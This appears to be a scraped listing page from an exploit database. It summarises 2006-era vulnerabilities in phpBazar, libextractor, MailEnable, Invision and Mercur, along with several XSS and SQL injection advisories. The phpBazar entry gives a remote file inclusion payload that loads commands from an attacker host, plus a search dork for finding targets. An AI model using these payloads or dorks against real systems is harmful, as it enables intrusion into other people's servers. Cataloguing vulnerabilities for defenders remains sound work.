phpBazar 2.1.0 - Remote File Inclusion Authentication Bypass

phpBazar 2.1.0 - Remote File Inclusion Authentication Bypass Title: phpBazar = 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classifiedright.php?languagedir=http://yourhost/cmd.gif?cmd=ls -access to admin login...

libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits

Exploit for multiple platform in category dos / poc ========================================================== libextractor = 0.5.13 Multiple Heap Overflow PoC Exploits ========================================================== http://www.inj3ct0r.com/sploits/6149.zip 0day.today 2018-04-02...

libextractor &lt;= 0.5.13 Multiple Heap Overflow PoC Exploits

No description provided by source. libextractor = 0.5.13 Multiple Heap Overflow PoC Exploits http://www.milw0rm.com/sploits/05172006-libextho.zip milw0rm.com 2006-05-17...

libextractor 0.5.13 - Multiple Heap Overflows (PoC)

libextractor = 0.5.13 Multiple Heap Overflow PoC Exploits https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1801.zip 05172006-libextho.zip milw0rm.com 2006-05-17...

GLSA-200605-11 : Ruby: Denial of Service

The remote host is affected by the vulnerability described in GLSA-200605-11 Ruby: Denial of Service Ruby uses blocking sockets for WEBrick and XMLRPC servers. Impact : An attacker could send large amounts of data to an affected server to block the socket and thus deny other connections to the...

Mac OS X Multiple Vulnerabilities (Security Update 2006-003)

The remote host is running Apple Mac OS X, but lacks Security Update 2006-003. This security update contains fixes for the following applications : AppKit ImageIO BOM CFNetwork ClamAV Mac OS X Server only CoreFoundation CoreGraphics Finder FTPServer Flash Player KeyCHain LaunchServices libcurl Ma...

EImagePro - view.asp?Pic SQL Injection

EImagePro - view.asp?Pic SQL Injection source: https://www.securityfocus.com/bid/17911/info EImagePro is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. Successful exploi...

Albinator 2.0.8 - &#039;dlisting.php?cid&#039; Cross-Site Scripting

source: https://www.securityfocus.com/bid/17826/info Albinator is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code executed in the browser of an...

OrbitHYIP 2.0 - signup.php?referral Cross-Site Scripting

OrbitHYIP 2.0 - signup.php?referral Cross-Site Scripting source: https://www.securityfocus.com/bid/17766/info OrbitHYIP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverag...

Invision Vulnerabilities, including remote code execution

Several Invision Flaws 2.1.5 and possibly earlier --------------------------------------------------- IceShaman & Wells HackThisSite.org 1 Code execution sources/actionpublic/search.php line 1261 $this-output = pregreplace "value="'$this-ipsclass-input'lastdate'"'i", "1 selected='selected'",...

linux/x86 xor-encoded Connect Back Shellcode 371 bytes

Exploit for linux/x86 platform in category shellcode ====================================================== linux/x86 xor-encoded Connect Back Shellcode 371 bytes ====================================================== linux/x86 xor-encoded Connect Back Shellcode 371 bytes...

Authentication flaw

Unspecified vulnerability in the POP service in MailEnable Standard Edition before 1.94, Professional Edition before 1.74, and Enterprise Edition before 1.22 has unknown attack vectors and impact related to "authentication exploits". NOTE: this is a different set of affected versions, and probabl...

CVE-2006-1792

Unspecified vulnerability in the POP service in MailEnable Standard Edition before 1.94, Professional Edition before 1.74, and Enterprise Edition before 1.22 has unknown attack vectors and impact related to "authentication exploits". NOTE: this is a different set of affected versions, and probabl...

CVE-2006-1792

CVE-2006-1792 pertains to MailEnable’s POP service with affected versions: Standard Edition before 1.94, Professional Edition before 1.74, and Enterprise Edition before 1.22. The vulnerability is described as unspecified with unknown attack vectors and impact related to “authentication exploits.”...

Hacked SQL Server system ten ways-vulnerability warning-the black bar safety net

Using either the manual probe or the use of security testing tools, malicious attackers always use a variety of tricks from your firewall to internal and external compromise your SQL Server system. Since the hackers do such a thing. You also need to implement the same attacks to test your system'...

PHPWebGallery Multiple Cross Site Scripting Vulnerabilities

Title : PHPWebGallery Multiple Cross Site Scripting Vulnerabilities Author: Mourad aka Psych0 root at linuxmail org Moroccan Security Team Vendor: www.phpwebgallery.net Software: PHPWebGallery Version: 1.4.1 category.php and picture.php scripts are vulnerable to XSS attacks. Exploits:...

Sire 2.0 Nws Remote File inclusion &amp; Arbitary Files Upload

by Moroccan Security Team Geetz To All Freind +File Inclusion: Input passed to the "rub" parameter in "lire.php" isn't properly verified, before it is used to include remote files Successful exploitation requires that "registerglobals" is enabled. lire.php code ? 73...

For the new network domain name Management System Security reviews-exploits warning-the black bar safety net

It is well known, the new network users in China domain name registration industry, the proportion of the column is still very large. But I found a new web domain system, there exists a safety hazard. One day I From the agent the domain Control Panel login to the new network there, accidentally...

New exploit by SpiderZ

Author: SpiderZ Exploit 01 phpBB 2.0.19 Topic infinitely exploit multiple topic http://spiderz.netsons.org/1.txt Exploit 02 Mini-Nuke v1.8 XSS http://spiderz.netsons.org/3.txt Exploit 03 CuteCast Version 1.2 multiple users http://spiderz.netsons.org/4.txt Exploit 04 IPB v1.x upload html .gif...

Mercur MailServer 5.0 SP3 - &#039;IMAP&#039; Remote Buffer Overflow (1)

/ mercur.cpp Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit Copyright C 2006 Javaphile Group http://www.javaphile.org Exploits code by : pll Ellison.Tangatgmaildotcom Bug Reference: http://www.frsirt.com/bulletins/4332 / include include include include pragma commentli...